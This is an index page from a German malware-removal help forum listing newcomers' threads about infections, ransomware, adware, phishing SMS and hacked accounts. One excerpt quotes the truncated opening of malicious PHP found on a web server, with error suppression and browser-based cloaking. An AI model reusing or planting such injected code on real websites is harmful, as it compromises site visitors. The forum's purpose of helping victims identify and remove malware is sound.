Zurück   Trojaner-Board > Themen

Alles zum Thema: Neuling

  Letzter Beitrag Antworten Hits Forum
Malwarebytes blockiert ausgehende Chrome Verbindung
Neuling - Hallo zusammen, bin Neuling in diesem Forum und habe heute folgende Auffälligkeit von Malwarebytes bei meinem Windows 11 gehabt. Der dabei blockierte Empfänger hat die IP: 45.133.44.52. Whois meldet hierzu DataWeb Global Group B.V. Im Forum habe ich bereits herausgefunden, dass Chrome...
Log-Analyse und Auswertung
TR/AD.FireHooker.BU
Neuling - Hallo zusammen, ich bin Neuling bei diesem Thema und befolge ausdrücklich euren Rat, nicht blind die selben Schritte zu befolgen, die ich schon in einem anderen Post gefunden habe. Ich nutze bisher den kostenfreien Virenscanner von Avira und erhalte seit einiger Zeit einen Sicherheitshinweis...
Log-Analyse und Auswertung
Ich suche guten Virenscanner für win 10 & android
Neuling - Schade, dass ich den Namen des hier http://www.trojaner-board.de/191546-irgendeine-malware-tarnt-avast.html erwähnten anderen Virenscanners nicht erfahre :confused: Ich probiere/benutze/teste diverse Antivirusprogramme (Kaspersky, Avast, AVG, MS Defender usw.) seit Jahren. Mit keinem davon bin...
Antiviren-, Firewall- und andere Schutzprogramme
Allgemeines Feedback und Anliegen zum Löschen
Neuling - Hallo trojaner-board, ich danke cosinus für seine Mühen mir helfen zu wollen. Leider verlief unsere Kommunikation nicht reibungslos und voller Missverständnissen. Ich bereue jedoch nicht mich an euch gewendet zu haben. Ihr leistet hier wirklich gutes Engagement! Mein Thread wurde in die...
Lob, Kritik und Wünsche
Problem mit topbuyer in Download - lässt sich nicht löschen.
Neuling - Hallo, ich bin relativer Neuling auf diesem Gebiet und hoffe, dass ihr mir weiterhelfen könnt. Ich habe das Problem, seit nun 2 Jahren und bekomme diesen topbuyer *Mist* einfach nicht gelöscht. Was kann ich dagegen machen, dass ich ihn irgendwie von meinem Laptop runter bekomme? Das Ganze...
Alles rund um Windows
Combofix-Log-Auswertung für Neuling
Neuling - Hallo! Ich bin ganz neu hier, also versteht es bitte, falls ich irgendwas falsch mache/gemacht habe. Ich war heute auf meinem Amazon-Konto, weil ich etwas bestellen wollte. Als ich mich einloggen wollte, stand dort auf einmal im login eine andere als meine eigene Mail-Adresse. Es war eine...
Log-Analyse und Auswertung
BrowserModifier: Win32/SupTab!blnk
Neuling - Einen halbwegs guten Tag, kann ja nicht vollkommen gut sein, sonst wär ich nicht hier :lach: Bin ein Neuling auf diesem board, nicht ganz unzurechnungsfähig was den Computer angeht und bin bisher eigentlich immer gut mit den Suchmaschinen-Antworten klar gekommen, aber jetzt... Wie der Titel...
Plagegeister aller Art und deren Bekämpfung
Ein ganz liebes Danke an Cosinus
Neuling - :dankeschoen:Ich möchte mich hier bei Cosinus ganz lieb bedanken. Ich als Neuling auf dem Board,hatte auch gleich ein Problem :headbang:und seine nette und ruhige Art ,auch auf meine Schusseligkeiten ( txt im Code ) gelassen zu reagieren..machte es mir leicht und einfach das gewünsche...
Lob, Kritik und Wünsche
Windows 8.1 - Virus? Win32:Rootkit-gen(rtk) möglicherweise nicht entfernt?
Neuling - Hallo liebe PC-Fans und Fachmenschen, ich habe wahrscheinlich ein Virus auf meinem PC, dieser ist 3 Wochen alt und dies Virus auch. Windows 8.1. Avastbeschreibung. Win32:Rootkit-gen(rtk), Objekt C:\Windows\SysWOW64\Windowsd.web.dll Habe seitdem beim Start sofort die Meldung Von Hitmanpro:...
Plagegeister aller Art und deren Bekämpfung
sos@decryptfiles - zuza@protonmail
Neuling - Hallo im Forum! Als Neuling habe ich schon eine brennede Frage Hat jemand Erfahrungen mit sos@decryptfiles - zuza@protonmail gemacht? Gibt es dafür schon irgendwelche tools? Die befallenen Dateien (*.docx, *.pdf, *.jpg) haben folgende Namensänderung erfahren: aus "2015.pdf" wurde
Plagegeister aller Art und deren Bekämpfung
omniboxes Virus
Neuling - Guten tag an alle habe das Problem das ich nicht sicher bin ob ich den omniboxes Virus drauf habe habe mit anti Anti-Malware geskennt und mit avira auch wie stelle ich fest ob er noch da ist auf meinen Rechner bin da ein bisschen verunsichert welche schritte ich machen soll bitte um Hilfe bin noch...
Plagegeister aller Art und deren Bekämpfung
Bundled software uninstaller/ extrem langsam / tastatur verädert sich manchmal zB. man drückt z und es kommt n .
Neuling - hallo erstmal, aslo der leptop von meiner schwester ist seit langem sehr langsam hängt und macht nicht das was er soll:wtf:auf jedenfall hab ich habe hier ein passenden thema zu meinem problem gefunden und habe auf eigene faus gehandelt:headbang: und jetzt ist es noch schlimmer^^ich habe mir...
Log-Analyse und Auswertung
Sandboxie 4.14 nicht mit Windows 7 starten ?
Neuling - Hallo, Ich bin ein Neuling, was das Programm Sandboxie betrifft. Ich installierte es mir gestern erst. Obwohl ich mir das Menü schon mehrmals angesehen habe, konnte ich dennoch keinen Option finden, wo ich einstellen kann, dass das Programm nicht automatisch mit Windows 7 startet. Kann es sein,...
Antiviren-, Firewall- und andere Schutzprogramme
Nach DETEKT-Check und 4 Staatstrojaner auf meinen Computer entdecken!
Neuling - Hallo! Ich bin hier Neuling und habe gestern DETEKT-Check ausgeführt. Ich war erstaunt, dass mein Computer 4 Staatstrojaner injiziert wurde. Wie kann ich alle Trojaner löschen? Ich hoffe dass jemand von hier mich helfen kann. siehe Anhang... ...
Log-Analyse und Auswertung
Cpu ist immer zu 100% ausgelastet
Neuling - Hallo leute! Ich entschuldige mich jetzt schon falls ich was nicht verstehe oder dergleichen bin´komplett neu auf dem Gebiet :dummguck: Also mein Laptop(hp probook 470g1) startet schon nicht gerade sehr schnell ok aber gut.. Jedoch kommt die cpu erst nach 10 minuten ca von 100% auf 40%...
Plagegeister aller Art und deren Bekämpfung
nach Installation von adobe reader Probleme mit öffnen andere Programme
Neuling - hallo Alle miteinander, muß gleich zu Anfang sagen,daß ich bei Foren u.s.w.fast ein Neuling bin,also entschuldigt, falls ich irgendein "Mist" schreib. mein Problem ist, daß nach Installation von Adobe reader einige Programme wie zum B.s.p.Browser 7 Telekom,Mozilla,TuneUp u.s.w nur noch mit adobe...
Log-Analyse und Auswertung
Trojaner? = http://goo.gl/eVstQT
Neuling - Hallo ich bin absoluter Neuling hier und kann leider nichts zutreffendes zu meiner Sache finden. Falls das Thema bereits behandelt wurde verzeit mir und verweist mich auf dem entsprechenden Link. Danke Also, mein Anliegen ist folgendes. Habe eine SMS auf mein Handy erhalten >> mama. Ihr DHL...
Plagegeister aller Art und deren Bekämpfung
iolorgdf 32 program not found skipping autocheck
Neuling - Hallo Ihr seit heute beim hochfahren des Sony Vaio kommt immer folgendes : iolorgdf32 program not found skipping autocheck was kann ich machen ?
Alles rund um Windows
Habe ich Probleme mit Laptop, scannen - richtig gemacht? auswertung!
Neuling - Hallo , ich bin neu hier und habe einen etwa 2 Jahre alten Laptop,und habe den eigentlich nur mit Hilfe AVG PC Tuneup und ab und an mal mit Antimalewarebytes gescannt, aber ich weiss halt nicht ob ich irgendwo was an Schädlingen usw drauf habe.. Darum erbitte ich mir ein wenig Hilfe, wie ich...
Log-Analyse und Auswertung
Hotmail-Account verschickt Spam an alle Kontakte
Neuling - Hallo, ich habe folgendes Problem: Letzte Nacht hat mein Hotmail-Account an alle meine Kontakte Mails mit irgendwelchen Links verschickt. Einer meiner Kontakte antwortete mir, dass ich scheinbar gehackt wurde und doch bitte mein Passwort sofort ändern und eine Warnung an alle Kontakte absetzten...
Plagegeister aller Art und deren Bekämpfung
Schadsoftware auf Webserver (PHP)
Neuling - Auf einem Webserver fand ich folgenden Schadcode: #c18fce# error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER; if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){...
Alles rund um Mac OSX & Linux
Spybot Fund Downloadsponsor
Neuling - Hey, ein heute durchgeführter Scan mit Spybot hat mir zwei Einträge beschert, die unter der Rubrik "Downloadsponsor" gelistet waren. Nach Entfernung hat ein erneuter Spybot Scan nichts mehr gefunden. Nach dem Fund habe ich jetzt ein ungutes Gefühl und würde gerne sicher gehen, dass mein...
Plagegeister aller Art und deren Bekämpfung
Supergau, windows 8 nimmt mein Passwort nicht mehr!!
Neuling - Hallo, Ich hoffe jemand kann mir helfen. Bin windows8 Neuling, richte grade alles ein. So, nun will dieses Teil mein Passwort nicht mehr! Aber ich hab mich nicht vertippt oder ein falsches gespeichert. Ich bekomme gleich Zustände!! Wie komm ich aus der Nummer raus? Ich habe schon gelesen,...
Alles rund um Windows
EXP/CVE-2014-0322.D in und TR/Patched.Ren.Gen über Avira gefunden
Neuling - Hallo zusammen, ich bin neu im Forum, also verzeiht mir bitte "Fehler" die man hier als Neuling und ziemlicher Computerlaie so macht :pfeiff: Wie es scheint habe ich mir ein paar unliebsame Dateien eingefangen. Gestern hat zuerst der Echtzeitscanner von Avira Alarm geschlagen...
Log-Analyse und Auswertung
Win32.Downloader.gen entfernen?
Neuling - Hallo! ich habe auf meinem PC mit Spybot den Trojaner Win32.Downloader.gen MalwareC entdeckt. Wie kann ich den wieder loswerden? Könnt ihr mir helfen? Vielen Dank schonmal! LG
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.